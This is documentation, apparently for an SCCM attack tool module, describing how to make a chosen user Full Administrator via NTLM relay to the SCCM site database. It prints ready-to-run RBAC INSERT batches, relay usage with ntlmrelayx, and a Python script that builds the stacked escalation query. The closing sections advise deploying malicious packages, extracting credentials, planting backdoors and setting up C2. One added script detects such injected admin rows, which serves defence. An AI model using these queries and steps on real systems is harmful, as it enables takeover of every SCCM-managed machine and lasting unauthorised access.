The mssql module generates SQL queries designed for use in NTLM relay attacks against SCCM site databases. Executed against the site database, either through an NTLM relay or with direct database access, the queries add a chosen domain user to the Full Administrator security role, which grants full control over the SCCM hierarchy.
The module only generates the queries; it does not execute them. Whoever runs them needs a path to the site database, which makes this a critical privilege escalation vector wherever that path exists.

Attack Overview

The MSSQL privilege escalation attack works by:
  1. User SID Resolution: Converting the target username to its corresponding SID
  2. Query Generation: Creating SQL statements to add the user to SCCM administrative roles
  3. Role Assignment: Granting Full Administrator permissions with appropriate scope access
  4. RBAC Configuration: Setting up Role-Based Access Control permissions
This attack leverages SCCM’s Role-Based Access Control (RBAC) system to grant administrative privileges. The generated queries can be used in NTLM relay attacks against SQL servers hosting SCCM databases.

SCCM Role-Based Access Control

Understanding SCCM RBAC

SCCM uses a sophisticated RBAC system with three key components:
  • Administrative Users: Users or groups with SCCM permissions
  • Security Roles: Predefined permission sets (Full Administrator, etc.)
  • Security Scopes: Define what objects the user can manage

Prerequisites

Requirements

  • Valid Active Directory credentials for SID resolution
  • Target user account to elevate privileges for
  • SCCM site code for the target environment
  • NTLM relay capability against SCCM SQL servers
  • Network access to domain controller for SID resolution

Command Syntax

python3 sccmhunter.py mssql [OPTIONS]

Parameters

Target options:

  Parameter   Description                                   Example
  -d          Target domain name                            internal.lab
  -dc-ip      Domain controller IP or FQDN                  10.10.100.100
  -tu         Target user to grant SCCM admin privileges    lowpriv
  -sc         SCCM site code for privilege assignment       LAB

Authentication options:

  Parameter   Description                                   Example
  -u          Username for authentication                   administrator
  -p          Password for authentication                   P@ssw0rd
  -hashes     LM:NT hash for authentication                 aad3b435b51404ee:5fbc3d5fec8206a30f4b6c473d68ae76
  -k          Use Kerberos authentication
  -no-pass    Don't prompt for password
  -aes        AES key for Kerberos (128 or 256 bits)
  -ldaps      Use LDAPS instead of LDAP

Output options:

  Parameter   Description                                   Use Case
  -stacked    Generate a single stacked query               NTLM relay attacks that execute only one query
  -debug      Enable verbose logging                        Troubleshooting and detailed output
The -stacked flag combines all privilege escalation statements into a single batch, which is what NTLM relay tooling needs when it can execute only one query per relayed connection.

Usage Examples

Generate separate SQL queries for manual execution or multi-step NTLM relay attacks
python3 sccmhunter.py mssql -u administrator -p P@ssw0rd -d internal.lab -dc-ip 10.10.100.100 -tu lowpriv -sc LAB
Expected Output:
[22:52:14] INFO     [*] Resolving lowpriv SID...
[22:52:14] INFO     [*] Converted lowpriv SID to 0x0105000000000005150000005407A9EE65B1F9B01FFF385E59040000
[22:52:14] INFO     [*] Use the following to add lowpriv as a Site Server Admin.

use CM_LAB
INSERT INTO RBAC_Admins (AdminSID,LogonName,IsGroup,IsDeleted,CreatedBy,CreatedDate,ModifiedBy,ModifiedDate,SourceSite)
VALUES (0x0105000000000005150000005407A9EE65B1F9B01FFF385E59040000,'LAB\lowpriv',0,0,'','','','','LAB');
SELECT AdminID,LogonName FROM RBAC_Admins;

[*] Enter AdminID:12345

INSERT INTO RBAC_ExtendedPermissions (AdminID,RoleID,ScopeID,ScopeTypeID) VALUES (12345,'SMS0001R','SMS00ALL','29');
INSERT INTO RBAC_ExtendedPermissions (AdminID,RoleID,ScopeID,ScopeTypeID) VALUES (12345,'SMS0001R','SMS00001','1');
INSERT INTO RBAC_ExtendedPermissions (AdminID,RoleID,ScopeID,ScopeTypeID) VALUES (12345,'SMS0001R','SMS00004','1');
The individual queries require interactive input: the AdminID returned by the SELECT after the first INSERT must be typed back into the tool so it can fill in the RBAC_ExtendedPermissions statements. This approach is useful for manual SQL execution or when you have interactive access to the database.
Generate a single SQL statement combining all privilege escalation steps
python3 sccmhunter.py mssql -u administrator -p P@ssw0rd -d internal.lab -dc-ip 10.10.100.100 -tu lowpriv -sc LAB -stacked
Expected Output:
[22:55:05] INFO     [*] Resolving lowpriv SID...
[22:55:05] INFO     [*] Converted lowpriv SID to 0x0105000000000005150000005407A9EE65B1F9B01FFF385E59040000
[22:55:05] INFO     [*] Use the following to add lowpriv as a Site Server Admin.

USE CM_LAB;
INSERT INTO RBAC_Admins (AdminSID,LogonName,IsGroup,IsDeleted,CreatedBy,CreatedDate,ModifiedBy,ModifiedDate,SourceSite)
VALUES (0x0105000000000005150000005407A9EE65B1F9B01FFF385E59040000,'LAB\lowpriv',0,0,'','','','','LAB');
INSERT INTO RBAC_ExtendedPermissions (AdminID,RoleID,ScopeID,ScopeTypeID)
VALUES ((SELECT AdminID FROM RBAC_Admins WHERE LogonName = 'LAB\lowpriv'),'SMS0001R','SMS00ALL','29');
INSERT INTO RBAC_ExtendedPermissions (AdminID,RoleID,ScopeID,ScopeTypeID)
VALUES ((SELECT AdminID FROM RBAC_Admins WHERE LogonName = 'LAB\lowpriv'),'SMS0001R','SMS00001','1');
INSERT INTO RBAC_ExtendedPermissions (AdminID,RoleID,ScopeID,ScopeTypeID)
VALUES ((SELECT AdminID FROM RBAC_Admins WHERE LogonName = 'LAB\lowpriv'),'SMS0001R','SMS00004','1');
The stacked form is the one to use for NTLM relay, where the relay tool runs a single batch per relayed connection (for example the query passed to ntlmrelayx with -q when the target is mssql://). Subqueries on LogonName look up the AdminID at execution time, so no interactive input is needed.
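The steps in the Attack Overview (SID resolution, then query generation) can be reproduced offline. The following is an added example written for this page, not sccmhunter's own code: it converts a string SID into the binary form SCCM stores in RBAC_Admins.AdminSID (the 0x0105... value shown in the output above) and builds the same stacked batch from it. In the real tool the SID comes from the user's objectSid in LDAP; here the SID is decoded from the AdminSID value printed above, and the site code check and SQL quoting helper are this example's own additions.

```python
"""Added example (not sccmhunter's own code): string SID <-> binary SID
conversion and generation of the stacked RBAC privilege escalation batch."""
import struct


def sid_to_bytes(sid: str) -> bytes:
    """Convert 'S-1-5-21-...-RID' to the Windows binary SID layout:
    revision (1 byte) | sub-authority count (1 byte) |
    identifier authority (6 bytes, big-endian) |
    sub-authorities (4 bytes each, little-endian)."""
    parts = sid.split("-")
    if len(parts) < 3 or parts[0].upper() != "S":
        raise ValueError(f"not a SID: {sid!r}")
    revision, authority = int(parts[1]), int(parts[2])
    subauths = [int(p) for p in parts[3:]]
    if len(subauths) > 15:
        raise ValueError("a SID carries at most 15 sub-authorities")
    out = struct.pack("<BB", revision, len(subauths))
    out += authority.to_bytes(6, "big")
    out += b"".join(struct.pack("<I", s) for s in subauths)
    return out


def bytes_to_sid(raw: bytes) -> str:
    """Inverse of sid_to_bytes; rejects a buffer whose length does not match
    the sub-authority count so a truncated value is not silently accepted."""
    revision, count = struct.unpack_from("<BB", raw, 0)
    if len(raw) != 8 + 4 * count:
        raise ValueError("length does not match sub-authority count")
    authority = int.from_bytes(raw[2:8], "big")
    subauths = struct.unpack_from(f"<{count}I", raw, 8)
    return f"S-{revision}-{authority}" + "".join(f"-{s}" for s in subauths)


def sql_literal(value: str) -> str:
    """Quote a T-SQL string literal (single quotes doubled), so a logon name
    or site code containing a quote cannot break the batch."""
    return "'" + value.replace("'", "''") + "'"


# (RoleID, ScopeID, ScopeTypeID) rows the stacked query inserts: Full Administrator
# on the All security scope, the All Systems collection and the All Users and
# User Groups collection.
FULL_ADMIN_GRANTS = (
    ("SMS0001R", "SMS00ALL", "29"),
    ("SMS0001R", "SMS00001", "1"),
    ("SMS0001R", "SMS00004", "1"),
)


def build_stacked_query(sid: str, netbios_domain: str, username: str, site_code: str) -> str:
    """Build the single-batch privilege escalation query for one user."""
    # The database name is CM_<site code>; site codes are three alphanumeric
    # characters, so refuse anything else rather than building an identifier
    # from free text (this check is the example's own addition).
    if not (len(site_code) == 3 and site_code.isalnum()):
        raise ValueError("site code must be three alphanumeric characters")
    admin_sid = "0x" + sid_to_bytes(sid).hex().upper()
    logon = sql_literal(f"{netbios_domain}\\{username}")
    lines = [
        f"USE CM_{site_code};",
        "INSERT INTO RBAC_Admins (AdminSID,LogonName,IsGroup,IsDeleted,CreatedBy,"
        "CreatedDate,ModifiedBy,ModifiedDate,SourceSite)",
        f"VALUES ({admin_sid},{logon},0,0,'','','','',{sql_literal(site_code)});",
    ]
    for role, scope, scope_type in FULL_ADMIN_GRANTS:
        lines.append("INSERT INTO RBAC_ExtendedPermissions (AdminID,RoleID,ScopeID,ScopeTypeID)")
        lines.append(
            f"VALUES ((SELECT AdminID FROM RBAC_Admins WHERE LogonName = {logon}),"
            f"{sql_literal(role)},{sql_literal(scope)},{sql_literal(scope_type)});"
        )
    return "\n".join(lines)


if __name__ == "__main__":
    # Constructed input: the AdminSID value from the tool output above, decoded
    # back to its S-1-5-21-... form and then turned into the batch.
    sid = bytes_to_sid(bytes.fromhex("0105000000000005150000005407A9EE65B1F9B01FFF385E59040000"))
    print(sid)
    print(build_stacked_query(sid, "LAB", "lowpriv", "LAB"))
```

Decoding the AdminSID shown above gives S-1-5-21-4004054868-2969153893-1580793631-1113, so RID 1113 is the account being elevated; running the round trip on a SID you resolved yourself is a quick way to confirm the hex the tool prints before relaying it.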

Understanding the SQL Queries

RBAC Database Tables

The generated queries modify two SCCM database tables:
  • RBAC_Admins: Stores administrative users (binary SID, logon name, group flag, audit columns, source site)
  • RBAC_ExtendedPermissions: Links each AdminID to a RoleID within a ScopeID; the scope rows (one security scope plus collections) are what grant access to SCCM objects
1. RBAC_Admins Table Insert
  • Adds the target user as an SCCM administrative user
  • Stores the logon name in NetBIOS DOMAIN\username form (LAB\lowpriv), which is how SCCM records it
  • Uses the resolved SID, in its binary form, to identify the account
  • Leaves CreatedBy, CreatedDate, ModifiedBy and ModifiedDate empty, unlike an admin created through the console
2. RBAC_ExtendedPermissions Assignments
  • SMS0001R: Full Administrator security role (highest privileges)
  • SMS00ALL: the built-in "All" security scope (ScopeTypeID 29), covering every securable object
  • SMS00001: the All Systems collection (ScopeTypeID 1)
  • SMS00004: the All Users and User Groups collection (ScopeTypeID 1)
3. Role and Scope Combinations
  • Each row links an admin to one role within one scope: the role defines which actions are allowed, the scope defines which objects and collections they apply to
  • Full Administrator on the All scope plus the two root collections is what the console assigns when a Full Administrator is given access to all objects, so the account can manage every object and every collection in the site

Attack Integration

NTLM Relay Prerequisites

Required for Attack Success:
  • An identity whose NTLM authentication can be relayed and that has write access to the site database (the site server's computer account, which SCCM grants rights on the site database, is the usual target)
  • A way to make that identity authenticate to the attacker: coerced authentication or a man-in-the-middle position on the network
  • The SQL Server accepting NTLM logins without Extended Protection for Authentication; channel binding defeats relay to the TDS service, and SMB signing on the SQL host is not what matters here, since the relay target is the SQL service rather than SMB
  • Network reachability from the relay host to the SQL Server's TDS port

Post-Exploitation Benefits

Gained Capabilities:
  • Full SCCM administrative access
  • Software deployment to all systems
  • Operating system deployment control
  • Access to all SCCM credentials and secrets

Verification and Testing

After Query Execution:
  1. Log into SCCM console with elevated account
  2. Verify administrative role assignment in RBAC settings
  3. Test software deployment capabilities
  4. Confirm access to administrative functions
SCCM Console Access:
  • Navigate to Administration > Security > Administrative Users
  • Verify the target user appears with Full Administrator role
  • Test creating and deploying applications or task sequences
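The same verification can be done from the database side, and the query doubles as the check a defender runs for unexpected Full Administrators. The following is an added example written for this page, not part of sccmhunter or of Configuration Manager: it lists every account holding SMS0001R and flags rows whose audit columns are empty, which is what the generated INSERT leaves behind. The tables are a constructed SQLite stand-in reduced to the columns the queries above touch; the AdminIDs, the console-created admin rows and the placeholder role ID OTHER_ROLE are made up for the sample.

```python
"""Added example (not sccmhunter or SCCM code): audit Full Administrator grants
in RBAC_Admins / RBAC_ExtendedPermissions and flag rows with empty audit columns."""
import sqlite3

# Portable SQL: runs unchanged against SQLite here and, after USE CM_<site>,
# against the real site database.
AUDIT_SQL = """
SELECT a.AdminID, a.LogonName, a.CreatedBy, a.CreatedDate,
       COUNT(p.ScopeID) AS grants,
       SUM(CASE WHEN p.ScopeID = 'SMS00ALL' THEN 1 ELSE 0 END) AS all_scope
FROM RBAC_Admins a
JOIN RBAC_ExtendedPermissions p ON p.AdminID = a.AdminID
WHERE p.RoleID = 'SMS0001R' AND a.IsDeleted = 0
GROUP BY a.AdminID, a.LogonName, a.CreatedBy, a.CreatedDate
"""

INJECTED_SID = bytes.fromhex("0105000000000005150000005407A9EE65B1F9B01FFF385E59040000")


def build_sample_db() -> sqlite3.Connection:
    """Constructed data: two console-created admins and one row inserted the
    way the stacked query does it (empty CreatedBy/CreatedDate/Modified*)."""
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE RBAC_Admins (
            AdminID INTEGER PRIMARY KEY, AdminSID BLOB, LogonName TEXT,
            IsGroup INTEGER, IsDeleted INTEGER, CreatedBy TEXT, CreatedDate TEXT,
            ModifiedBy TEXT, ModifiedDate TEXT, SourceSite TEXT);
        CREATE TABLE RBAC_ExtendedPermissions (
            AdminID INTEGER, RoleID TEXT, ScopeID TEXT, ScopeTypeID TEXT);
    """)
    con.executemany("INSERT INTO RBAC_Admins VALUES (?,?,?,?,?,?,?,?,?,?)", [
        (16777217, b"\x01\x05", "LAB\\cmadmin", 0, 0,
         "LAB\\setupadmin", "2023-06-01 08:00:00", "LAB\\setupadmin", "2023-06-01 08:00:00", "LAB"),
        (16777218, b"\x01\x05", "LAB\\helpdesk", 0, 0,
         "LAB\\cmadmin", "2023-07-15 10:30:00", "LAB\\cmadmin", "2023-07-15 10:30:00", "LAB"),
        (16777219, INJECTED_SID, "LAB\\lowpriv", 0, 0, "", "", "", "", "LAB"),
    ])
    con.executemany("INSERT INTO RBAC_ExtendedPermissions VALUES (?,?,?,?)", [
        (16777217, "SMS0001R", "SMS00ALL", "29"),
        (16777217, "SMS0001R", "SMS00001", "1"),
        (16777217, "SMS0001R", "SMS00004", "1"),
        (16777218, "OTHER_ROLE", "SMS00ALL", "29"),   # placeholder, not a real SCCM role ID
        (16777219, "SMS0001R", "SMS00ALL", "29"),
        (16777219, "SMS0001R", "SMS00001", "1"),
        (16777219, "SMS0001R", "SMS00004", "1"),
    ])
    return con


def audit_fields_missing(created_by, created_date) -> bool:
    """The generated INSERT writes '' into the audit columns. If CreatedDate is a
    datetime column on the real server, '' is stored as the 1900-01-01 default,
    so treat that the same as empty."""
    by_missing = (created_by or "").strip() == ""
    date = (created_date or "").strip()
    date_missing = date == "" or date.startswith("1900-01-01")
    return by_missing or date_missing


def find_full_admins(con: sqlite3.Connection) -> list:
    """Return one record per account holding SMS0001R, with a review flag."""
    result = []
    for admin_id, logon, created_by, created_date, grants, all_scope in con.execute(AUDIT_SQL):
        result.append({
            "AdminID": admin_id,
            "LogonName": logon,
            "grants": grants,
            "all_scope": bool(all_scope),
            "missing_audit_fields": audit_fields_missing(created_by, created_date),
        })
    return result


if __name__ == "__main__":
    for r in find_full_admins(build_sample_db()):
        flag = "REVIEW" if r["missing_audit_fields"] else "ok"
        print(f"{flag:6} {r['LogonName']:16} grants={r['grants']} all_scope={r['all_scope']}")
```

An account that was legitimately promoted shows the promoting admin and a timestamp; the row the stacked query creates shows neither, so the flag separates the two even when both hold the same role and scopes. From the attacker's side the same query confirms that all three grants landed before opening the console.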

Next Steps

SCCM Administration

Leverage Full Access:
  • Deploy malicious software packages
  • Extract additional credentials
  • Lateral movement via client push
  • Operating system deployment abuse

DPAPI Extraction

Use SCCM admin access to extract secrets from client systems

Persistence

Maintain Access:
  • Create additional admin accounts
  • Deploy persistent backdoors
  • Establish C2 infrastructure
  • Document infrastructure for future access